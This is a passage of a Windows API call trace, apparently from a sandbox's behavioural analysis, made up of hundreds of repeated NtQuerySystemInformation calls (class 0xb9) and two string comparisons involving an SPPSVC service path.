SystemInformation=0xa781ffdca0, Length=0x48, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x28, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x28, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x48, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x28, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x28, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x50, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x50, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x50, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7c0, Length=0x28, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7c0, Length=0x28, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7c0, Length=0x28, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd830, Length=0x28, ResultLength=0x0) [0234.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8b0, Length=0x28, ResultLength=0x0) [0234.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8b0, Length=0x28, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x20, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x20, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x50, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x50, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x50, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x50, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7c0, Length=0x28, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7c0, Length=0x28, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7c0, Length=0x28, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd830, Length=0x28, ResultLength=0x0) [0234.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8b0, Length=0x28, ResultLength=0x0) [0234.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8b0, Length=0x28, ResultLength=0x0) [0234.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x20, ResultLength=0x0) [0234.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x38, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x20, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdba0, Length=0x28, ResultLength=0x0) [0234.203] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x28, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x28, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x28, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9f0, Length=0x28, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda70, Length=0x28, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda70, Length=0x28, ResultLength=0x0) [0234.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9d0, Length=0x20, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9d0, Length=0x20, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdba0, Length=0x28, ResultLength=0x0) [0234.216] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x50, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x28, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x28, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x28, ResultLength=0x0) [0234.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9f0, Length=0x28, ResultLength=0x0) [0234.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.221] NtQuerySystemInformation (SystemInformationClass=0xb9, 